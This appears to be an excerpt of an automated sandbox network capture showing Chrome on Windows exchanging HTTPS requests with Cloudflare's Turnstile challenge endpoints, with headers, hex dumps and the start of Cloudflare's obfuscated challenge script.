                                                          2024-08-27 22:10:40 UTC795OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:40 UTC240INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:40 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          cache-control: max-age=2629800, public
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f649cec661916-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:40 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.449763104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:41 UTC438OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:41 UTC240INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:41 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          cache-control: max-age=2629800, public
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f64a2098e5e7f-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:41 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.449762104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:41 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8b9f6497ee820fa4&lang=auto HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: */*
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:41 UTC331INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:41 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 124031
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f64a21a3d1839-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:41 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 5a 63 51 66 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c
                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.ZcQf2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcl
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 22 54 69 6d 65 64 25 32 30 6f 75 74 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 20 66 65 65 64 62 61 63 6b 20 72 65 70 6f 72 74 20 68 61 73 20 62 65 65 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 75 62 6d 69 74 74 65 64 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 72 65 66 72 65 73 68 22 3a 22 52 65
                                                          Data Ascii: oncepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_timeout":"Timed%20out","feedback_report_output_subtitle":"Your feedback report has been successfully submitted","turnstile_refresh":"Re
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 61 72 73 65 49 6e 74 28 67 48 28 35 30 37 29 29 2f 31 30 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 39 35 36 38 39 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 35 37 32 29 5d 2c 65 4d 5b 67 49 28 38 31 30 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 33 39 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 67 29 7b 69 66 28 68 67 3d 67 49 2c 65 4d 5b 68 67 28 38 31 30 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 67 28 38 31 30 29 5d 3d 21 21 5b 5d 7d 2c 65 55 3d 30 2c 65 4e 5b 67 49 28 38 33 34 29 5d 3d 3d 3d 67 49 28 31 37 32 36 29 3f 65 4e 5b 67 49 28 37 36 38 29 5d 28 67 49 28
                                                          Data Ascii: arseInt(gH(507))/10),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,956893),eM=this||self,eN=eM[gI(1572)],eM[gI(810)]=![],eM[gI(394)]=function(hg){if(hg=gI,eM[hg(810)])return;eM[hg(810)]=!![]},eU=0,eN[gI(834)]===gI(1726)?eN[gI(768)](gI(
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 35 36 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 68 4a 2c 4a 2c 48 29 7b 69 66 28 68 4a 3d 68 48 2c 68 4a 28 31 30 32 34 29 21 3d 3d 6f 5b 68 4a 28 38 35 37 29 5d 29 73 5b 6f 5b 68 4a 28 35 39 34 29 5d 5d 26 26 28 4a 3d 7b 7d 2c 4a 5b 68 4a 28 31 33 33 35 29 5d 3d 68 4a 28 31 34 30 30 29 2c 4a 5b 68 4a 28 34 35 33 29 5d 3d 6a 5b 68 4a 28 31 33 35 31 29 5d 5b 68 4a 28 31 37 30 38 29 5d 2c 4a 5b 68 4a 28 31 33 30 36 29 5d 3d 68 4a 28 33 33 35 29 2c 4a 5b 68 4a 28 31 36 34 34 29 5d 3d 68 4a 28 38 31 35 29 2c 4a 5b 6f 5b 68 4a 28 35 39 34 29 5d 5d 5b 68 4a 28 31 34 33 35 29 5d 28 4a 2c 27 2a 27 29 29 3b 65 6c 73 65 7b 66 6f 72 28 47 5b 68 4a 28 31 33 33 31 29 5d 28 29 2c 48 3d 30 3b 6f 5b 68 4a 28 39 34 36 29 5d 28 48 2c 47 5b 68 4a 28 38 32 36
                                                          Data Ascii: 56))](x)):function(G,hJ,J,H){if(hJ=hH,hJ(1024)!==o[hJ(857)])s[o[hJ(594)]]&&(J={},J[hJ(1335)]=hJ(1400),J[hJ(453)]=j[hJ(1351)][hJ(1708)],J[hJ(1306)]=hJ(335),J[hJ(1644)]=hJ(815),J[o[hJ(594)]][hJ(1435)](J,'*'));else{for(G[hJ(1331)](),H=0;o[hJ(946)](H,G[hJ(826
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 4d 5b 68 4c 28 34 35 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 4d 29 7b 68 4d 3d 68 4c 2c 65 4d 5b 68 4d 28 31 36 32 31 29 5d 26 26 28 65 5b 68 4d 28 35 34 38 29 5d 21 3d 3d 68 4d 28 36 30 39 29 3f 28 65 4d 5b 68 4d 28 36 32 31 29 5d 5b 68 4d 28 31 34 35 31 29 5d 28 29 2c 65 4d 5b 68 4d 28 36 32 31 29 5d 5b 68 4d 28 31 33 33 33 29 5d 28 29 2c 65 4d 5b 68 4d 28 31 30 34 30 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 68 4d 28 31 36 32 31 29 5d 5b 68 4d 28 31 34 33 35 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 68 4d 28 31 30 39 35 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 68 4d 28 31 33 35 31 29 5d 5b 68 4d 28 31 37 30 38 29 5d 2c 27 65 76 65 6e 74 27 3a 68 4d 28 31 31 38 39 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 65 4d 5b 68 4d 28 31 33 35 31 29 5d 5b 68 4d
                                                          Data Ascii: M[hL(450)](function(hM){hM=hL,eM[hM(1621)]&&(e[hM(548)]!==hM(609)?(eM[hM(621)][hM(1451)](),eM[hM(621)][hM(1333)](),eM[hM(1040)]=!![],eM[hM(1621)][hM(1435)]({'source':e[hM(1095)],'widgetId':eM[hM(1351)][hM(1708)],'event':hM(1189),'cfChlOut':eM[hM(1351)][hM
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 3a 68 4f 28 31 32 35 39 29 2c 27 75 66 54 42 50 27 3a 68 4f 28 34 36 34 29 2c 27 57 6f 70 52 42 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 62 63 43 54 71 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 7a 64 6c 5a 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2b 6d 7d 2c 27 72 54 5a 43 5a 27 3a 68 4f 28 38 31 34 29 2c 27 54 63 70 7a 51 27 3a 68 4f 28 37 30 37 29 7d 2c 69 3d 63 5b 68 4f 28 38 30 34 29 5d 28 29 2c 6a 3d 68 5b 68 4f 28 31 31 32 33 29 5d 2c 69 5b 68 4f 28 31 33 32 30 29 5d 28 6a 29 3e 2d 31 29 3f 65 4d 5b 68 4f 28 34 35 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 50 29 7b 68 50 3d 68 4f 2c 65 4d 5b 68 50 28 31 38 33 38 29 5d 28 29 7d
                                                          Data Ascii: :hO(1259),'ufTBP':hO(464),'WopRB':function(l,m){return l+m},'bcCTq':function(l,m){return l+m},'zdlZo':function(l,m){return l+m},'rTZCZ':hO(814),'TcpzQ':hO(707)},i=c[hO(804)](),j=h[hO(1123)],i[hO(1320)](j)>-1)?eM[hO(450)](function(hP){hP=hO,eM[hP(1838)]()}
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 63 68 28 6b 29 7b 69 66 28 67 3d 61 31 2e 68 5b 64 5b 69 45 28 31 34 35 32 29 5d 28 32 37 2c 61 32 2e 67 29 5d 2c 30 3c 67 5b 69 45 28 38 32 36 29 5d 29 7b 66 6f 72 28 69 3d 69 45 28 31 33 36 33 29 5b 69 45 28 31 36 34 33 29 5d 28 27 7c 27 29 2c 6a 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 69 5b 6a 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 61 64 2e 68 5b 61 65 2e 67 5e 36 34 5d 5b 69 45 28 34 31 39 29 5d 28 68 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 61 62 2e 68 5b 33 5e 61 63 2e 67 5d 3d 67 5b 69 45 28 31 35 31 35 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 61 39 2e 68 5b 61 61 2e 67 5e 32 32 31 5d 3d 6b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 69 66 28 68 3d 3d 3d 2d 31 29 74 68 72 6f 77 20 6b 3b
                                                          Data Ascii: ch(k){if(g=a1.h[d[iE(1452)](27,a2.g)],0<g[iE(826)]){for(i=iE(1363)[iE(1643)]('|'),j=0;!![];){switch(i[j++]){case'0':ad.h[ae.g^64][iE(419)](h);continue;case'1':ab.h[3^ac.g]=g[iE(1515)]();continue;case'2':a9.h[aa.g^221]=k;continue;case'3':if(h===-1)throw k;
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 74 75 72 6e 20 68 3c 69 7d 2c 27 59 6a 78 59 74 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 75 67 55 52 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 69 66 42 72 62 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 47 69 78 50 70 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 77 67 66 62 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 73 6f 68 71 61 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 72 52 6a 69 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 70 4a 67
                                                          Data Ascii: turn h<i},'YjxYt':function(h,i){return h>i},'ugURp':function(h,i){return h(i)},'ifBrb':function(h,i){return i&h},'GixPp':function(h,i){return i|h},'wgfbm':function(h,i){return h-i},'sohqa':function(h,i){return h<<i},'rRjiB':function(h,i){return h==i},'pJg
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 69 66 28 4e 3d 6a 5b 6a 53 28 31 34 35 34 29 5d 28 4d 29 2c 4f 62 6a 65 63 74 5b 6a 53 28 35 31 35 29 5d 5b 6a 53 28 31 37 37 37 29 5d 5b 6a 53 28 31 32 37 37 29 5d 28 44 2c 4e 29 7c 7c 28 44 5b 4e 5d 3d 48 2b 2b 2c 45 5b 4e 5d 3d 21 30 29 2c 4f 3d 46 2b 4e 2c 4f 62 6a 65 63 74 5b 6a 53 28 35 31 35 29 5d 5b 6a 53 28 31 37 37 37 29 5d 5b 6a 53 28 31 32 37 37 29 5d 28 44 2c 4f 29 29 46 3d 4f 3b 65 6c 73 65 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 53 28 35 31 35 29 5d 5b 6a 53 28 31 37 37 37 29 5d 5b 6a 53 28 31 32 37 37 29 5d 28 45 2c 46 29 29 7b 69 66 28 64 5b 6a 53 28 31 33 34 33 29 5d 28 32 35 36 2c 46 5b 6a 53 28 33 36 33 29 5d 28 30 29 29 29 7b 69 66 28 6a 53 28 31 30 31 31 29 21 3d 3d 6a 53 28 31 30 31 31 29 29 72 65 74 75 72 6e 3b 65 6c 73 65 7b 66 6f 72
                                                          Data Ascii: if(N=j[jS(1454)](M),Object[jS(515)][jS(1777)][jS(1277)](D,N)||(D[N]=H++,E[N]=!0),O=F+N,Object[jS(515)][jS(1777)][jS(1277)](D,O))F=O;else{if(Object[jS(515)][jS(1777)][jS(1277)](E,F)){if(d[jS(1343)](256,F[jS(363)](0))){if(jS(1011)!==jS(1011))return;else{for
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 46 5b 6a 53 28 33 36 33 29 5d 28 30 29 2c 43 3d 30 3b 31 36 3e 43 3b 4b 3d 64 5b 6a 53 28 31 36 30 36 29 5d 28 4b 3c 3c 31 2c 50 26 31 29 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b 6a 53 28 35 37 31 29 5d 28 73 28 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 47 2d 2d 2c 47 3d 3d 30 26 26 28 47 3d 4d 61 74 68 5b 6a 53 28 31 31 31 37 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 6a 53 28 39 34 32 29 5d 28 4b 3c 3c 31 2c 64 5b 6a 53 28 31 37 31 34 29 5d 28 50 2c 31 29 29 2c 6f 2d 31 3d 3d 4c 3f 28 4c 3d 30 2c 4a 5b 6a 53 28 35 37 31 29 5d 28 64 5b 6a 53 28 38 30 38 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b
                                                          Data Ascii: F[jS(363)](0),C=0;16>C;K=d[jS(1606)](K<<1,P&1),L==o-1?(L=0,J[jS(571)](s(K)),K=0):L++,P>>=1,C++);}G--,G==0&&(G=Math[jS(1117)](2,I),I++),delete E[F]}else for(P=D[F],C=0;C<I;K=d[jS(942)](K<<1,d[jS(1714)](P,1)),o-1==L?(L=0,J[jS(571)](d[jS(808)](s,K)),K=0):L++


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.449766104.18.94.414431188C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-08-27 22:10:41 UTC926OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1155709742:1724793999:jZYsAJ5BQ_g2p6ZQyC6e2YcpgeQ98hmygX8r-9lG55k/8b9f6497ee820fa4/ec492f91dc9d6a6 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          Content-Length: 2714
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          Content-type: application/x-www-form-urlencoded
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          CF-Challenge: ec492f91dc9d6a6
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Origin: https://challenges.cloudflare.com
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: cors
                                                          Sec-Fetch-Dest: empty
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/idxkc/0x4AAAAAAAhuDbq9Zssi-YOu/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-08-27 22:10:41 UTC2714OUTData Raw: 76 5f 38 62 39 66 36 34 39 37 65 65 38 32 30 66 61 34 3d 6e 64 76 4d 37 4d 75 4d 72 4d 55 4d 41 4d 69 73 38 4a 73 38 79 30 67 79 67 55 5a 4e 67 5a 38 67 30 63 55 4c 67 6a 63 38 47 73 38 67 4c 79 38 54 38 71 48 38 47 79 36 4f 63 38 6d 38 45 4d 63 79 38 56 71 72 38 67 72 38 4c 30 67 53 37 77 68 57 50 36 38 39 4d 35 58 38 71 58 76 75 76 38 5a 70 4f 5a 68 63 42 4f 47 63 38 6a 35 4d 25 32 62 4d 38 48 4d 75 58 72 43 50 5a 2b 6c 38 4e 50 4d 63 64 31 54 57 30 67 79 42 75 68 56 4a 6d 4e 62 79 4a 72 4d 76 45 63 76 38 4e 31 4d 38 4c 72 70 39 68 5a 2d 36 69 76 43 73 38 68 79 38 76 57 41 4d 77 4d 35 34 6a 75 4d 38 63 7a 61 39 41 62 58 38 78 4d 67 34 38 5a 77 44 64 36 36 38 56 72 63 4f 38 62 64 38 49 72 70 4c 79 7a 6c 38 47 74 38 50 4b 51 30 4f 77 4f 38 56 76 79 39 58
                                                          Data Ascii: v_8b9f6497ee820fa4=ndvM7MuMrMUMAMis8Js8y0gygUZNgZ8g0cULgjc8Gs8gLy8T8qH8Gy6Oc8m8EMcy8Vqr8gr8L0gS7whWP689M5X8qXvuv8ZpOZhcBOGc8j5M%2bM8HMuXrCPZ+l8NPMcd1TW0gyBuhVJmNbyJrMvEcv8N1M8Lrp9hZ-6ivCs8hy8vWAMwM54juM8cza9AbX8xMg48ZwDd668VrcO8bd8IrpLyzl8Gt8PKQ0OwO8Vvy9X
                                                          2024-08-27 22:10:41 UTC747INHTTP/1.1 200 OK
                                                          Date: Tue, 27 Aug 2024 22:10:41 GMT
                                                          Content-Type: text/plain; charset=UTF-8
                                                          Content-Length: 151488
                                                          Connection: close
                                                          cf-chl-gen: 81L9B5cCBPufWw8bJ4oWlix6bDEMAq3jwHspab1YQ/JjmsqHNML+z1WGlmPOWf8JRFqfH0mxRgRW+yhn4WNF8bdWMAWLrZ+c08SzpPMVaIBJ0zzYXcQ9UWHutUhKQJsMGaCDDIex8cysb47GcLPD8E6OdSjkqj93Fzk0ij651re/WF1KKdrIyjvHIbWfvEL1nZHagNNQ9fa7ksB8HVNlBYNvpiJTvUdQ8qbr5l0g3RE6cYS9ms+pnm1foM8mn6tvKQo6l1W1T2QnnpPzzjs5SWSjPx0CchEAbZWGKg8c1cr/wbzgmgEHyPQzRnT7dqv6kkQBqBsagN+oivBTroaszUhLdbQVI4///kJlo2XgPKnn9dxYCSf0U41Ii0vIhUHrVfW3tbK501N8QipbAXvJrqoL/chsakL/Q+8flyqed3xwwFWQzOOZsdCLUg7tD8k0/uU9deRSh5Gskzz5jgr/9Roq+jZZTpa2C7SDtk1Pzkb16mw=$MbRgX8gJkUGgzMeB
                                                          Server: cloudflare
                                                          CF-RAY: 8b9f64a2eaca42d0-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-08-27 22:10:41 UTC622INData Raw: 78 70 33 46 69 4b 66 4f 78 49 2b 6c 30 71 4f 2f 71 4a 2b 2b 30 74 44 43 72 61 2b 58 79 62 6a 51 33 74 76 56 6c 63 48 41 30 4a 2b 38 73 2b 44 6f 77 61 58 6b 32 63 50 70 30 4d 58 71 73 74 44 6c 36 4c 66 69 7a 66 6e 64 75 73 72 59 33 72 72 56 35 66 55 41 75 65 4d 41 34 77 50 37 32 77 37 4b 45 74 38 4b 79 52 59 54 42 65 33 6a 34 74 6e 74 36 78 77 56 2f 4f 73 52 47 42 77 54 2b 65 48 7a 33 69 67 64 46 50 6e 6b 4d 43 67 66 48 50 44 77 38 6a 55 78 47 50 59 35 4e 54 41 4e 4f 76 30 74 44 44 41 38 50 44 4d 46 41 68 59 58 53 51 6f 36 46 30 30 4f 51 42 38 2b 4c 79 46 49 54 54 55 51 54 43 31 63 55 69 38 6f 56 69 6b 35 51 30 4e 4f 51 6a 45 2f 51 6d 68 57 51 6c 67 6d 49 44 70 66 4b 32 74 63 58 43 35 67 4b 54 45 76 52 58 6b 38 55 6c 35 78 4d 6f 42 76 62 6c 31 57 63 56 74
                                                          Data Ascii: xp3FiKfOxI+l0qO/qJ++0tDCra+XybjQ3tvVlcHA0J+8s+DowaXk2cPp0MXqstDl6LfizfndusrY3rrV5fUAueMA4wP72w7KEt8KyRYTBe3j4tnt6xwV/OsRGBwT+eHz3igdFPnkMCgfHPDw8jUxGPY5NTANOv0tDDA8PDMFAhYXSQo6F00OQB8+LyFITTUQTC1cUi8oVik5Q0NOQjE/QmhWQlgmIDpfK2tcXC5gKTEvRXk8Ul5xMoBvbl1WcVt
                                                          2024-08-27 22:10:41 UTC1369INData Raw: 79 53 56 48 5a 64 6f 57 74 2b 66 46 32 53 6d 57 61 6c 59 35 53 70 65 36 75 58 73 5a 71 76 63 61 78 78 63 4a 2b 78 69 34 79 79 6c 48 4f 38 6e 48 6d 30 75 62 4f 52 6a 6f 39 39 6c 49 6e 47 6c 61 43 68 79 73 48 4c 6a 36 2f 42 30 4b 79 53 74 36 6a 47 77 73 65 74 7a 4b 32 61 6d 62 65 72 73 73 37 61 32 36 57 78 78 37 72 67 34 4f 69 32 31 39 69 35 38 4f 6d 77 33 61 79 75 74 38 50 6f 78 64 4c 48 74 75 6e 62 30 2b 50 78 30 4d 48 54 30 66 62 41 79 51 58 67 78 67 7a 4d 2f 76 41 4b 37 50 44 7a 37 41 7a 58 42 42 72 74 37 42 50 36 37 51 4c 30 2f 68 44 67 37 64 77 6f 4b 53 41 47 2f 66 33 6e 48 51 73 6e 4a 77 63 43 4b 77 55 43 39 6a 41 4a 47 41 77 32 44 66 55 2b 4f 68 46 44 4d 6a 34 56 52 79 42 43 47 55 70 4b 52 68 31 51 50 6b 6f 68 56 43 78 4f 4a 56 67 67 55 69 6c 62 47
                                                          Data Ascii: ySVHZdoWt+fF2SmWalY5Spe6uXsZqvcaxxcJ+xi4yylHO8nHm0ubORjo99lInGlaChysHLj6/B0KySt6jGwsetzK2amberss7a26Wxx7rg4Oi219i58Omw3ayut8PoxdLHtunb0+Px0MHT0fbAyQXgxgzM/vAK7PDz7AzXBBrt7BP67QL0/hDg7dwoKSAG/f3nHQsnJwcCKwUC9jAJGAw2DfU+OhFDMj4VRyBCGUpKRh1QPkohVCxOJVggUilbG
